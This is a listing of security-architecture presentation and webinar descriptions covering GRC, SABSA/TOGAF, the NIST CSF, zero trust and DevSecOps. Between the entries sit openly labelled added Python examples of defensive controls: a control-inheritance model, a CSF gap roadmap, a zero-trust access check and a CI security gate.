What is GRC – Governance, Risk and Compliance - BOC Group
A simple guide to learn what Governance, Risk and Compliance (GRC) is all about, why it’s important and how you can use it to help drive enterprise objectives.
For more information visit: https://www.boc-group.com/governance-risk-and-compliance/
The presentations should help security professionals create security architecture that supports business objectives, covers all areas of security technology, and allows for effective measurement of security value.
The presentation was given at BrightTalk.
What is a secure enterprise architecture roadmap? - Ulf Mattsson
Webcast title : What is a Secure Enterprise Architecture Roadmap?
Description : This session will cover the following topics:
* What is a Secure Enterprise Architecture roadmap (SEA)?
* Are there different Roadmaps for different industries?
* How does compliance fit in with a SEA?
* Do blockchain, GDPR, cloud and IoT conflict with compliance regulations, complicating your SEA?
* How will quantum computing impact the SEA roadmap?
Presenters : Juanita Koilpillai, Bob Flores, Mark Rasch, Ulf Mattsson, David Morris
Duration : 68 min
Date & Time : Sep 20 2018 8:00 am
Timezone : United States - New York
Webcast URL : https://www.brighttalk.com/webinar/what-is-a-secure-enterprise-architecture-roadmap
HD version: http://1drv.ms/1eR5OQf
This is my publication on how the integration of the TOGAF Enterprise Architecture framework, the SABSA Enterprise Security Architecture framework and the Information Governance discipline adds up to a robust and successful Information Security Management Program.
Solution architects must be aware of the need for solution security and of the need to have enterprise-level controls that solutions can adopt.
The sets of components that comprise the extended solution landscape, including those components that provide common or shared functionality, are located in different zones, each with different security characteristics.
The functional and operational design of any solution and therefore its security will include many of these components, including those inherited by the solution or common components used by the solution.
The complete solution security view should refer explicitly to the components and their controls.
While each individual solution should be able to inherit the security controls provided by these components, the solution design should include explicit reference to them for completeness and to avoid unvalidated assumptions.
There is a common and generalised set of components, many of which are shared, within the wider solution topology that should be considered when assessing overall solution architecture and solution security.
Individual solutions must be able to inherit security controls, facilities and standards from common enterprise-level controls, standards, toolsets and frameworks.
Individual solutions must not be forced to implement individual infrastructural security facilities and controls. This is wasteful of solution implementation resources, results in multiple non-standard approaches to security and represents a security risk to the organisation.
The extended solution landscape potentially consists of a large number of interacting components and entities located in different zones, each with different security profiles, requirements and concerns. Different security concerns and therefore controls apply to each of these components.
Solution security is not covered by a single control. It involves multiple overlapping sets of controls providing layers of security.
Information technology is a complex business, at best. While IT can provide amazing benefits, it still requires vigilance and diligence to ensure it is running correctly and that it is secure. A security framework can be an excellent tool to evaluate what you might be missing and confirm that what you are already doing is spot-on correct. This session will discuss the importance of using security frameworks and walk attendees through the NIST Cyber Security Framework to review how the framework functions, how to use a framework, and most importantly, how the use of a framework can and will benefit their organization.
Solution Architecture And Solution Security - Alan McSweeney
This describes an approach to embedding security within the technology solution landscape. It describes a security model that encompasses the range from individual solution components up to the entire solution landscape. The solution security model allows the security status of a solution and its constituent delivery and operational components to be tracked wherever those components are located. This provides an integrated approach to solution security across all solution components and across the entire organisation topology of solutions. It allows the solution architect to validate the security of an individual solution. It enables the security status of the entire solution landscape to be assessed and recorded. Solution security is a wicked problem because there is no certainty about when the problem has been resolved and a state of security has been achieved. The security state of a solution can only be expressed along a subjective spectrum of better or worse rather than as a binary true or false. Solution security can also have negative consequences: it prevents types of access, limits availability in different ways, restricts the functionality provided, makes the solution harder to use, lengthens solution delivery times, increases costs along the entire solution lifecycle, and leads to loss of usability, utility and rate of use.
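The solution security model above, and the earlier principle that a solution design should reference the enterprise-level controls it inherits rather than assume them, can be made concrete as a small data model. The following is an added illustration, not code from the presentation: zones provide and require controls, shared enterprise components provide controls, and each solution component declares what it implements locally and what it assumes it inherits from a named provider. The assessment turns each assumption into either a validated inheritance with its provenance or an unvalidated assumption, and rolls the remaining gaps up across the landscape. Zone, component and control names are constructed sample data, and the zone policy is hypothetical.

```python
"""Solution security model: record each component's controls, where each one
is inherited from, and which assumed controls cannot be validated.

Added illustration of the model described above; it is not code from the
original presentation. Zones, components, control names and the zone policy
are constructed sample data, not an organisation's real landscape.
"""
from __future__ import annotations

from dataclasses import dataclass, field


@dataclass
class Zone:
    name: str
    provides: set[str]   # controls every component placed in the zone inherits
    requires: set[str]   # controls every component in the zone must end up with


@dataclass
class SharedComponent:
    """Enterprise-level component (gateway, IAM, logging) that solutions reuse."""
    name: str
    zone: str
    provides: set[str]


@dataclass
class Component:
    """One solution component: what it implements itself and what it assumes
    it inherits from a named shared component (control -> provider)."""
    name: str
    zone: str
    local_controls: set[str] = field(default_factory=set)
    assumed_from: dict[str, str] = field(default_factory=dict)


@dataclass
class ComponentStatus:
    component: str
    satisfied: dict[str, str]    # control -> provenance: local, zone:<z> or shared:<c>
    unvalidated: dict[str, str]  # assumed control -> why it could not be validated
    missing: set[str]            # required by the zone policy but provided by nothing


def assess_component(comp: Component, zones: dict[str, Zone],
                     shared: dict[str, SharedComponent]) -> ComponentStatus:
    zone = zones[comp.zone]
    satisfied = {c: "local" for c in comp.local_controls}
    for c in zone.provides:
        satisfied.setdefault(c, f"zone:{zone.name}")
    unvalidated: dict[str, str] = {}
    # An assumed inheritance only counts once the provider exists in the
    # landscape and actually offers that control; otherwise it stays an assumption.
    for control, provider in comp.assumed_from.items():
        sc = shared.get(provider)
        if sc is None:
            unvalidated[control] = f"{provider} is not in the landscape"
        elif control not in sc.provides:
            unvalidated[control] = f"{provider} does not provide {control}"
        else:
            satisfied.setdefault(control, f"shared:{provider}")
    missing = zone.requires - set(satisfied)
    return ComponentStatus(comp.name, satisfied, unvalidated, missing)


def assess_solution(components, zones, shared) -> list[ComponentStatus]:
    return [assess_component(c, zones, shared) for c in components]


def landscape_gaps(statuses: list[ComponentStatus]) -> dict[str, list[str]]:
    """Roll missing controls up across every assessed component so gaps can be
    recorded and prioritised landscape-wide, not solution by solution."""
    gaps: dict[str, list[str]] = {}
    for s in statuses:
        for control in sorted(s.missing):
            gaps.setdefault(control, []).append(s.component)
    return gaps


# --- constructed sample landscape -------------------------------------------
ZONES = {
    "dmz": Zone("dmz", {"network_segmentation", "ddos_protection"},
                {"network_segmentation", "tls", "waf", "authn", "audit_logging"}),
    "internal": Zone("internal", {"network_segmentation"},
                     {"network_segmentation", "authn", "audit_logging", "encryption_at_rest"}),
}
SHARED = {
    "api_gateway": SharedComponent("api_gateway", "dmz", {"tls", "waf", "rate_limiting"}),
    "iam": SharedComponent("iam", "internal", {"authn", "authz"}),
    "central_logging": SharedComponent("central_logging", "internal", {"audit_logging"}),
}
ORDERS_SOLUTION = [
    Component("orders_web", "dmz", {"input_validation"},
              {"tls": "api_gateway", "waf": "api_gateway",
               "authn": "iam", "audit_logging": "central_logging"}),
    # assumes a 'siem' component that does not exist in the landscape
    Component("orders_db", "internal", {"encryption_at_rest"},
              {"authn": "iam", "audit_logging": "siem"}),
    # assumes the gateway authenticates callers, which it does not
    Component("orders_worker", "internal", set(), {"authn": "api_gateway"}),
]


def example_assessment():
    statuses = assess_solution(ORDERS_SOLUTION, ZONES, SHARED)
    return {s.component: s for s in statuses}, landscape_gaps(statuses)


if __name__ == "__main__":
    by_component, gaps = example_assessment()
    for name, s in by_component.items():
        print(name, "missing:", sorted(s.missing), "unvalidated:", s.unvalidated)
    print("landscape gaps:", gaps)
```

Two of the three sample components fail for reasons that only show up because the assumption was written down: one names a provider that is not in the landscape, the other names a real provider for a control it does not offer. Both are exactly the "unvalidated assumptions" the design text warns about, and both would have passed a review that only listed controls without their provenance.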
How To Handle Cybersecurity Risk PowerPoint Presentation Slides - SlideTeam
Information technology experts can now take advantage of How To Handle Cybersecurity Risk PowerPoint Presentation Slides. This information security PPT theme infuses top-quality design with data obtained by industry experts. Explain the present situation of the target firm’s information security management employing this PowerPoint layout. The data visualizations featured here simplify the elucidation of complex data such as the analysis of the current IT department. Showcase the cybersecurity framework roadmap and risks of the internet using our PPT presentation. Elaborate on the cybersecurity risk management action plan using the tabular format via this PowerPoint slideshow. Demonstrate the cybersecurity contingency plan with appreciable ease. Our information security management system PPT templates deck assists you in assigning risk handling responsibilities to the staff. Explain the duties of the management in successful information security governance. This PowerPoint presentation also addresses the cost of cybersecurity management and staff training. Hit the download icon and start personalization. Our How To Handle Cybersecurity Risk PowerPoint Presentation Slides are explicit and effective. They combine clarity and concise expression. https://bit.ly/3o0xDkR
Enterprise Security Architecture for Cyber Security - The Open Group SA
Cyber Security is one of the major challenges facing organisations within all industries. This presentation will examine the integration of an Enterprise Architecture approach with an Enterprise Security Architecture approach (TOGAF and SABSA) and propose a generic framework.
Download this presentation at http://opengroup.co.za/presentations
Solution Architecture and Solution Acquisition - Alan McSweeney
This describes a systematised and structured approach to solution acquisition or procurement that involves solution architecture from the start, so that the true scope of both the required and the subsequently acquired solution is fully understood. Using such an approach avoids poor solution acquisition outcomes.
Solution architecture provides the structured approach to capturing all the cost contributors and knowing the true solution scope.
There is increasing packaged/product/service-based solution acquisition activity, and an increasing trend towards solutions hosted outside the organisation. Meanwhile solution acquisition outcomes are poor and getting worse.
Poor solution acquisition has long-term consequences and costs.
The to-be-acquired solution needs to operate in and co-exist with an existing solution topography and the solution acquisition process needs to be aware of and take account of this wider solution topography. Cloud-based or externally hosted and provided solutions do not eliminate the need for the solution to exist within the organisation solution topography.
Strategic misrepresentation in solution acquisition is the deliberate distortion or falsification of information relating to solution acquisition costs, complexity, required functionality, solution availability, resource availability, time to implement in order to get solution acquisition approval. Strategic misrepresentation is very real and its consequences can be very damaging.
Solution architecture has the skills and experience to define the real scope of the solution being acquired. An effective structured solution acquisition process, well-implemented and consistently applied, means dependable and repeatable solution acquisition and successful outcomes.
Build an Information Security Strategy - Andrew Byers
Organizations are struggling to keep up with today’s evolving threat landscape.
From technology sophistication and business adoption to the proliferation of hacking techniques and the expansion of hacking motivations, organizations are facing major security risks.
Every organization needs some kind of information security program to protect their systems and assets.
Organizations today face pressure from regulatory or legal obligations, customer requirement, and now, senior management expectations.
Almost every business decision requires executives and managers to balance risk and reward, and efficiency in that process is essential to an enterprise’s success. Too often though, IT risk (business risk related to the use of IT) is overlooked.
While other business risks such as market, credit and operational risks have long been incorporated into the decision-making processes, IT risk has usually been relegated to technical specialists outside the boardroom, despite falling under the same risk category as other business risks: failure to achieve strategic objectives.
This session intends to address business risks related to the use of IT, looking at industry standards, frameworks and best practices, as well as focusing on real world examples and specific plans on how to implement IT Risk Management on every level of your company.
Introduction to Risk Management via the NIST Cyber Security Framework - PECB
The cyber security profession has successfully established explicit guidance for practitioners to implement effective cyber security programs via the NIST Cyber Security Framework (CSF). The CSF provides both a roadmap and a measuring stick for effective cyber security. Application of the CSF within cyber is nothing new, but the resurgence of Enterprise Security Risk Management and Security Convergence highlights opportunities for expanded application to cyber, physical, and personnel security risks. The NIST CSF can help practitioners build a cross-pollinated understanding of holistic risk.
Main points covered:
• Understand the purpose, value, and application of the NIST CSF in familiar non-technical terms.
• Understand how the Functions and Categories of the NIST CSF (the CSF “Core”) and an organization's “current” and “target” profiles are relevant and valuable in a variety of sectors and environments.
• Understand how an organization’s physical and cyber security resources and stakeholders can align with the NIST CSF as a tool to achieve holistic security risk management.
Presenters:
David Feeney, CPP, PMP has 17 years of security industry experience assisting organizations with risk management matters specific to physical, personnel, and cyber security. He has 9 years of experience with service providers and 8 years of experience within enterprise security organizations. David has worked with industry leaders in the energy, technology, healthcare, and real estate sectors. Areas of specialization include Security Operations Center design and management, Security Systems design and implementation, and Enterprise Risk Management. David holds leadership positions in ASIS International and is also a member of the InfraGard FBI program. David holds Certified Protection Professional (CPP) and Project Management Professional (PMP) certifications.
Andrea LeStarge, MS has over ten years of experience in program management, risk analysis and curriculum development. Specializing in Homeland Security, Andrea draws on her experience managing projects that supported various Federal Government entities in identifying, detecting and responding to man-made, natural and cyber incidents. She has an established track record of recognizing security gaps and corrective risk mitigation options, and of communicating findings effectively to stakeholders, private sector owners and operators, and first-responder personnel at the tactical, operational and strategic levels. She applies analytical tradecraft and consistent, repeatable and defensible methodologies to risk and its elements of threat, vulnerability and consequence.
Recorded webinar: https://youtu.be/hxpuYtMQgf0
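The "current" and "target" profiles mentioned in the session outline are the part of the CSF that most directly becomes a roadmap, so here is an added worked example of that comparison; it is not material from the PECB webinar. The Category identifiers are the CSF 1.1 Core categories. Scoring each Category on the 1 to 4 Tier scale is a common practitioner adaptation and an assumption of this example, not the CSF's own definition (the CSF's Implementation Tiers describe the organisation as a whole), and the sample organisation's scores are constructed.

```python
"""NIST CSF Core profile comparison: current versus target profile by
Function and Category, with a phased roadmap that closes the gaps.

Added example illustrating the current/target profile idea above; it is not
material from the PECB webinar. Category identifiers are the CSF 1.1 Core
categories. Scoring each category on the 1-4 Tier scale is a practitioner
adaptation assumed here, not the CSF's own definition; the sample scores
are constructed.
"""
FUNCTIONS = ["ID", "PR", "DE", "RS", "RC"]   # Identify, Protect, Detect, Respond, Recover
CATEGORIES = {
    "ID.AM": "Asset Management", "ID.BE": "Business Environment",
    "ID.GV": "Governance", "ID.RA": "Risk Assessment",
    "ID.RM": "Risk Management Strategy", "ID.SC": "Supply Chain Risk Management",
    "PR.AC": "Identity Management, Authentication and Access Control",
    "PR.AT": "Awareness and Training", "PR.DS": "Data Security",
    "PR.IP": "Information Protection Processes and Procedures",
    "PR.MA": "Maintenance", "PR.PT": "Protective Technology",
    "DE.AE": "Anomalies and Events", "DE.CM": "Security Continuous Monitoring",
    "DE.DP": "Detection Processes",
    "RS.RP": "Response Planning", "RS.CO": "Communications", "RS.AN": "Analysis",
    "RS.MI": "Mitigation", "RS.IM": "Improvements",
    "RC.RP": "Recovery Planning", "RC.IM": "Improvements", "RC.CO": "Communications",
}
TIERS = {1: "Partial", 2: "Risk Informed", 3: "Repeatable", 4: "Adaptive"}
UNASSESSED = 1   # assumption: a category with no score is treated as Tier 1


def validate_profile(profile):
    for cat, tier in profile.items():
        if cat not in CATEGORIES:
            raise ValueError(f"unknown CSF category {cat}")
        if tier not in TIERS:
            raise ValueError(f"{cat}: tier {tier} outside 1-4")


def gap_report(current, target):
    """Rows of (category, current, target, gap), largest gap first, Core order within."""
    validate_profile(current)
    validate_profile(target)
    rows = []
    for cat in CATEGORIES:                 # Core order keeps each Function together
        if cat in current or cat in target:
            cur = current.get(cat, UNASSESSED)
            tgt = target.get(cat, cur)     # no target means: hold the current tier
            rows.append((cat, cur, tgt, max(tgt - cur, 0)))
    rows.sort(key=lambda r: -r[3])         # stable sort preserves Core order per gap size
    return rows


def function_rollup(profile):
    """Weakest category decides the Function's tier: a Function is not
    Repeatable while one of its categories is still Partial."""
    rollup = {}
    for fn in FUNCTIONS:
        scores = [t for cat, t in profile.items() if cat.startswith(fn + ".")]
        if scores:
            rollup[fn] = min(scores)
    return rollup


def roadmap(current, target):
    """Phases that raise every gapped category by one tier per phase until the
    target profile is met; each phase maps category -> new tier."""
    phases = []
    state = dict(current)
    while True:
        step = {cat: cur + 1 for cat, cur, tgt, gap in gap_report(state, target) if gap > 0}
        if not step:
            return phases
        phases.append(step)
        state.update(step)


# constructed sample organisation, scored on seven categories only
CURRENT = {"ID.AM": 2, "ID.RA": 1, "PR.AC": 3, "PR.DS": 2, "DE.CM": 1, "RS.RP": 2, "RC.RP": 1}
TARGET = {"ID.AM": 3, "ID.RA": 3, "PR.AC": 3, "PR.DS": 3, "DE.CM": 3, "RS.RP": 3, "RC.RP": 2}

if __name__ == "__main__":
    for cat, cur, tgt, gap in gap_report(CURRENT, TARGET):
        print(f"{cat} {CATEGORIES[cat]:<55} {TIERS[cur]:>14} -> {TIERS[tgt]:<14} gap {gap}")
    print("function rollup (current):", function_rollup(CURRENT))
    for i, phase in enumerate(roadmap(CURRENT, TARGET), 1):
        print(f"phase {i}: {phase}")
```

The roll-up deliberately takes the minimum rather than the average across a Function's categories: an averaged score hides the one Partial category (here ID.RA and DE.CM) that an attacker or an auditor will find first, which is the same reason the roadmap lifts every gapped category together instead of finishing one Function before starting the next.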
Adopting A Zero-Trust Model. Google Did It, Can You? - Zscaler
Based on 6 years of creating zero trust networks at Google, the BeyondCorp framework has led to the popularization of a new network security model within enterprises, called the software-defined perimeter.
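What distinguishes the BeyondCorp model from a perimeter is that every request is decided on the device's inventory record and the user's identity, and the network it arrives from carries no trust at all. The following added example, modelled on the publicly described BeyondCorp building blocks (device inventory, trust tiers, an access control engine in front of an access proxy), shows such a decision; it is neither Google's nor Zscaler's code. Devices, users, resources and the policy table are constructed sample data.

```python
"""Per-request zero-trust access decision in the style of BeyondCorp: trust
comes from the device's inventory record and the user's identity, never from
the network the request arrives on.

Added example modelled on the publicly described BeyondCorp building blocks;
it is neither Google's nor Zscaler's code. Devices, users, resources and the
policy table are constructed sample data.
"""
from dataclasses import dataclass

TIER_RANK = {"untrusted": 0, "basic": 1, "trusted": 2, "high": 3}


@dataclass(frozen=True)
class Device:
    device_id: str
    managed: bool         # enrolled in the device inventory and under management
    cert_valid: bool      # presented a valid device certificate on this request
    disk_encrypted: bool
    os_patched: bool


@dataclass(frozen=True)
class Request:
    user: str
    groups: frozenset
    mfa_verified: bool
    device_id: str
    resource: str
    source_network: str   # recorded for audit only; the decision ignores it


# resource -> (minimum device trust tier, group allowed to reach it)
POLICY = {
    "wiki": ("basic", "employees"),
    "source-code": ("trusted", "engineering"),
    "prod-admin": ("high", "sre"),
}


def device_tier(device):
    """Derive the trust tier from inventory facts; unknown devices are untrusted."""
    if device is None or not device.managed or not device.cert_valid:
        return "untrusted"
    if not device.disk_encrypted:
        return "basic"
    if not device.os_patched:
        return "trusted"
    return "high"


def decide(request, inventory):
    """Return (allowed, reason). Anything not in POLICY is denied by default."""
    if request.resource not in POLICY:
        return False, "unknown resource: default deny"
    min_tier, group = POLICY[request.resource]
    tier = device_tier(inventory.get(request.device_id))
    if TIER_RANK[tier] < TIER_RANK[min_tier]:
        return False, f"device tier {tier} below required {min_tier}"
    if group not in request.groups:
        return False, f"user {request.user} not in group {group}"
    if not request.mfa_verified:
        return False, "mfa required"
    return True, f"allowed: device tier {tier}, group {group}"


# --- constructed inventory and requests --------------------------------------
INVENTORY = {
    "laptop-1": Device("laptop-1", managed=True, cert_valid=True, disk_encrypted=True, os_patched=True),
    "laptop-2": Device("laptop-2", managed=True, cert_valid=True, disk_encrypted=True, os_patched=False),
}
ENG = frozenset({"employees", "engineering"})
SRE = frozenset({"employees", "sre"})


def example_decisions():
    return {
        # same user and resource: the managed laptop on the public internet is allowed...
        "managed_from_internet": decide(
            Request("alice", ENG, True, "laptop-1", "source-code", "internet"), INVENTORY),
        # ...the unknown personal device plugged into the corporate LAN is not
        "byod_from_corp_lan": decide(
            Request("alice", ENG, True, "byod-phone", "source-code", "corp-lan"), INVENTORY),
        # an unpatched managed device sits one tier short of what prod-admin needs
        "unpatched_to_prod": decide(
            Request("bob", SRE, True, "laptop-2", "prod-admin", "corp-lan"), INVENTORY),
        "wiki_without_mfa": decide(
            Request("bob", frozenset({"employees"}), False, "laptop-2", "wiki", "internet"), INVENTORY),
    }


if __name__ == "__main__":
    for name, (allowed, reason) in example_decisions().items():
        print(f"{name:<22} {'ALLOW' if allowed else 'DENY ':<5} {reason}")
```

The two `alice` requests are the point of the model: identical user, identical resource, opposite outcomes, and the only input that flipped the result is the device's inventory state, not whether the request came from the office LAN.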
Patch management is critical to reducing your attack surface and keeping your endpoints and business running smoothly. Unfortunately, it's also a process that must be repeated weekly, monthly, quarterly, and whenever critical fixes have been identified for your environment. The good news is: with the right tools and some advance planning, this process can run smoothly and leave your IT team with more time to support core business goals.
Join us to learn about trends in patch management, including the latest ways Ivanti is helping Security and IT teams work together like a well-oiled machine.
In today’s connected world, cyber security is a topic that nobody can afford to ignore. In recent years the number and frequency of attacks on industrial devices and other critical infrastructure has risen dramatically. Recent news stories about hackers shutting down critical infrastructure have left many companies wondering if they are vulnerable to similar attacks. In this webinar we will discuss the most common security threats and unique challenges in securing industrial networks. We will introduce the current standards and share some useful resources and best practices for addressing industrial cyber security.
Key Takeaways:
1. Gain perspective regarding common security threats facing industrial networks.
2. Learn about the relevant standards governing industrial cyber security.
3. Increase understanding of some best practices for securing industrial networks.
Enterprise Architecture
Enterprise Architectural Methodologies
A Brief History of Enterprise Architecture
Zachman Framework
Business Attributes
Features & Advantages
SABSA Lifecycle
SABSA Development Process
SMP Maturity Levels
Cognitive Computing: Company presentation by Tomer Weingarten, Co-Founder & CEO of SentinelOne at the NOAH Conference 2019 in Tel Aviv, Hangar 11, 10-11 April 2019.
In the ever-evolving, fast-paced Agile development world, application security has not scaled well. Incorporating application security and testing into the current development process is difficult, leading to incomplete tooling or unorthodox stoppages due to the required manual security assessments. Development teams are working with a backlog of stories—stories that are typically focused on features and functionality instead of security. Traditionally, security was viewed as a prevention of progress, but there are ways to incorporate security activities without hindering development. There are many types of security activities you can bake into your current development lifecycles—tooling, assessments, stories, scrums, iterative reviews, repo and bug tracking integrations—every organization has a unique solution and there are positives and negatives to each of them. In this slide deck, we go through the various solutions to help build security into the development process.
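One of the "repo and bug tracking integrations" the deck refers to is a pipeline gate that fails a build on serious new findings but lets through findings the team has consciously accepted and tracked in a ticket, so security stops being a "prevention of progress". The following is an added example of such a gate, not code from the original slide deck. The scanner output is a constructed, simplified JSON shape rather than any real tool's schema, and the accepted-risk register, ticket ids and dates are hypothetical.

```python
"""Security gate for a CI pipeline: block on findings at or above a severity
threshold, except those already accepted as risk in the bug tracker and not
yet expired, so the team is not stopped for issues it has consciously scheduled.

Added example of the tooling and bug-tracking integration idea above; it is
not from the original slide deck. The scanner output is a constructed,
simplified JSON shape (not a real tool's schema); the accepted-risk register,
ticket ids and dates are hypothetical.
"""
import json
import sys
from datetime import date

SEVERITY_RANK = {"low": 1, "medium": 2, "high": 3, "critical": 4}

# constructed scanner output; 'fingerprint' is a stable id for a finding across runs
SCAN_OUTPUT = json.dumps([
    {"rule": "sql-injection", "file": "app/orders.py", "line": 42, "severity": "high", "fingerprint": "f1"},
    {"rule": "hardcoded-secret", "file": "app/settings.py", "line": 7, "severity": "critical", "fingerprint": "f2"},
    {"rule": "weak-hash", "file": "app/legacy.py", "line": 110, "severity": "medium", "fingerprint": "f3"},
    {"rule": "debug-enabled", "file": "app/settings.py", "line": 12, "severity": "low", "fingerprint": "f4"},
])

# constructed accepted-risk register kept beside the code; every entry names a ticket
ACCEPTED_RISKS = [
    {"fingerprint": "f3", "ticket": "SEC-101", "expires": "2099-01-01"},
    {"fingerprint": "f1", "ticket": "SEC-77", "expires": "2020-01-01"},   # acceptance lapsed
    {"fingerprint": "f9", "ticket": "SEC-12", "expires": "2099-01-01"},   # finding no longer exists
]


def parse_findings(raw):
    findings = json.loads(raw)
    for f in findings:
        if f["severity"] not in SEVERITY_RANK:
            raise ValueError(f"unknown severity {f['severity']} in {f['fingerprint']}")
    return findings


def gate(findings, accepted, threshold="medium", today=None):
    """Return the verdict plus the evidence behind it. `today` is an ISO date
    string so runs are reproducible; None means the real current date."""
    today = date.fromisoformat(today) if today else date.today()
    register = {a["fingerprint"]: a for a in accepted}
    seen = {f["fingerprint"] for f in findings}
    blocking, accepted_out, expired, below = [], [], [], []
    for f in findings:
        if SEVERITY_RANK[f["severity"]] < SEVERITY_RANK[threshold]:
            below.append(f["fingerprint"])
            continue
        entry = register.get(f["fingerprint"])
        if entry and date.fromisoformat(entry["expires"]) >= today:
            accepted_out.append((f["fingerprint"], entry["ticket"]))
        else:
            if entry:                      # known, but the acceptance has expired
                expired.append((f["fingerprint"], entry["ticket"]))
            blocking.append(f)
    stale = [fp for fp in register if fp not in seen]   # register hygiene
    return {"passed": not blocking, "blocking": blocking, "accepted": accepted_out,
            "expired": expired, "below_threshold": below, "stale_entries": stale}


def run(raw=SCAN_OUTPUT, accepted=ACCEPTED_RISKS, today=None):
    return gate(parse_findings(raw), accepted, today=today)


if __name__ == "__main__":
    result = run()
    for f in result["blocking"]:
        print(f"BLOCK    {f['severity']:<8} {f['rule']} {f['file']}:{f['line']} ({f['fingerprint']})")
    for fp, ticket in result["accepted"]:
        print(f"ACCEPTED {fp} via {ticket}")
    for fp, ticket in result["expired"]:
        print(f"EXPIRED  {fp}: acceptance {ticket} has lapsed, re-review")
    for fp in result["stale_entries"]:
        print(f"STALE    {fp}: register entry matches no finding, remove it")
    sys.exit(0 if result["passed"] else 1)
```

Two details carry the weight: acceptances expire, so a risk accepted once cannot silently outlive the sprint that accepted it, and register entries that no longer match any finding are reported as stale, so the exception list shrinks as code is fixed instead of growing forever.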
Webinar presentation: November 17, 2016
Subject matter experts from the CSCC present an overview of the security standards, frameworks, and certifications that exist for cloud computing. We also discuss privacy considerations in light of new regulations (e.g., EU’s General Data Protection Regulation (GDPR)). This presentation helps cloud customers understand and distinguish between the different types of security standards that exist and assess the security standards support of their cloud service providers.
Read the CSCC's deliverable, Cloud Security Standards: What to Expect and What to Negotiate: http://www.cloud-council.org/deliverables/cloud-security-standards-what-to-expect-and-what-to-negotiate.htm
Webinar presentation September 20, 2016.
This deck introduces the CSCC’s deliverable, Cloud Security Standards: What to Expect and What to Negotiate V2.0, which was updated in August 2016 to reflect the latest developments in cloud security standards. The presentation is an overview of the various security standards, frameworks, and certifications that exist for cloud computing. This information will help cloud customers understand and distinguish between the different types of security standards that exist and assess the security standards support of their cloud service providers.
Read the CSCC's deliverable here: http://www.cloud-council.org/deliverables/cloud-security-standards-what-to-expect-and-what-to-negotiate.htm
Outpost24 webinar: cloud providers ate hosting companies' lunch, what's next?... – Outpost24
AWS, Azure and Google Cloud have disrupted the traditional infrastructure market. After realizing that security is a major roadblock to cloud adoption, they are putting money and effort into built-in security features. But hybrid setups remain a challenge for companies, and there is a learning curve for security teams to become proficient in the cloud. Find out how to choose the best toolset to secure your data in the cloud.
Enterprise DevOps is different than DevOps in startups and smaller companies. This session covers how AWS/CSC address this: how AWS IaaS-level automation via CloudFormation, UserData, the Console and APIs, plus some PaaS (OpsWorks/Beanstalk), is complemented by the CSC Agility Platform. CSC Agility adds application compliance and security to the AWS infrastructure compliance and security. CSC Agility allows for the creation of architecture blueprints for predefined application offerings.
Azure 101: Shared responsibility in the Azure Cloud – Paulo Renato
Whether you’re working exclusively on Azure or with multiple cloud environments, there are certain things you should consider when moving assets to the public cloud. As with any cloud deployment, security is a top priority, and moving your workloads to the Azure cloud doesn’t mean you’re not responsible for the security of your operating system, applications, and data.
Building on the security of the Azure infrastructure, this shared security responsibility starts with making sure your environment is secure. In this session, we will discuss step-by-step what you need to do to secure access at the administrative, application and network layers.
Security and DevOps: Agility and Teamwork - SID315 - re:Invent 2017 – Amazon Web Services
In this session, you learn pragmatic steps to integrate security controls into DevOps processes in your AWS environment at scale. Cyber security expert and founder of Alert Logic Misha Govshteyn shares insights from high performing teams who are embracing the reality that an agile security program can enable faster and more secure workload deployments. Joining Misha is Joey Peloquin, Director of Cloud Security Operations at Citrix, who discusses Citrix’s DevOps experiences and how they manage their cyber security posture within the AWS Cloud.
Session sponsored by Alert Logic
This presentation includes a cloud security overview, the Cloud Access Security Broker (CASB), CASB's four pillars, the proxy and API deployment modes, and the advantages and limitations of each deployment mode
(ENT202) Four Critical Things to Consider When Moving Your Core Business Appl... – Amazon Web Services
Does moving core business applications to AWS make sense for your organization? This session covers key business and IT considerations gathered from industry experts and real-world enterprise customers who have chosen to move their mission critical ERP applications to the AWS cloud, resulting in lower costs and better service.
This session covers the following:
- Insights from industry experts and analysts, who explain how the cloud affects costs from three angles: launch, operations, and long-term infrastructure expense
- Review of how time-to-value and cloud launch processes differ from on-premises infrastructure
- How AWS offers increased security and reliability over what some enterprises can afford on their own
Sponsored by Infor
JMeter webinar - integration with InfluxDB and Grafana – RTTS
Watch this recorded webinar about real-time monitoring of application performance. See how to integrate Apache JMeter, the open-source leader in performance testing, with InfluxDB, the open-source time-series database, and Grafana, the open-source analytics and visualization application.
In this webinar, we will review the benefits of leveraging InfluxDB and Grafana when executing load tests and demonstrate how these tools are used to visualize performance metrics.
Length: 30 minutes
Session Overview
-------------------------------------------
During this webinar, we will cover the following topics while demonstrating the integrations of JMeter, InfluxDB and Grafana:
- What out-of-the-box solutions are available for real-time monitoring JMeter tests?
- What are the benefits of integrating InfluxDB and Grafana into the load testing stack?
- Which features are provided by Grafana?
- Demonstration of InfluxDB and Grafana using a practice web application
To view the webinar recording, go to:
https://www.rttsweb.com/jmeter-integration-webinar
GraphRAG is All You need? LLM & Knowledge Graph – Guy Korland
Guy Korland, CEO and Co-founder of FalkorDB, will review two articles on the integration of language models with knowledge graphs.
1. Unifying Large Language Models and Knowledge Graphs: A Roadmap.
https://arxiv.org/abs/2306.08302
2. Microsoft Research's GraphRAG paper and a review paper on various uses of knowledge graphs:
https://www.microsoft.com/en-us/research/blog/graphrag-unlocking-llm-discovery-on-narrative-private-data/
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf – 91mobiles
91mobiles recently conducted a Smart TV Buyer Insights Survey in which we asked over 3,000 respondents about the TV they own, aspects they look at on a new TV, and their TV buying preferences.
Accelerate your Kubernetes clusters with Varnish Caching – Thijs Feryn
A presentation about the usage and availability of Varnish on Kubernetes. This talk explores the capabilities of Varnish caching and shows how to use the Varnish Helm chart to deploy it to Kubernetes.
This presentation was delivered at K8SUG Singapore. See https://feryn.eu/presentations/accelerate-your-kubernetes-clusters-with-varnish-caching-k8sug-singapore-28-2024 for more details.
Neuro-symbolic is not enough, we need neuro-*semantic* – Frank van Harmelen
Neuro-symbolic (NeSy) AI is on the rise. However, simply machine learning on just any symbolic structure is not sufficient to really harvest the gains of NeSy. These will only be gained when the symbolic structures have an actual semantics. I give an operational definition of semantics as “predictable inference”.
All of this illustrated with link prediction over knowledge graphs, but the argument is general.
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality – Inflectra
In this insightful webinar, Inflectra explores how artificial intelligence (AI) is transforming software development and testing. Discover how AI-powered tools are revolutionizing every stage of the software development lifecycle (SDLC), from design and prototyping to testing, deployment, and monitoring.
Learn about:
• The Future of Testing: How AI is shifting testing towards verification, analysis, and higher-level skills, while reducing repetitive tasks.
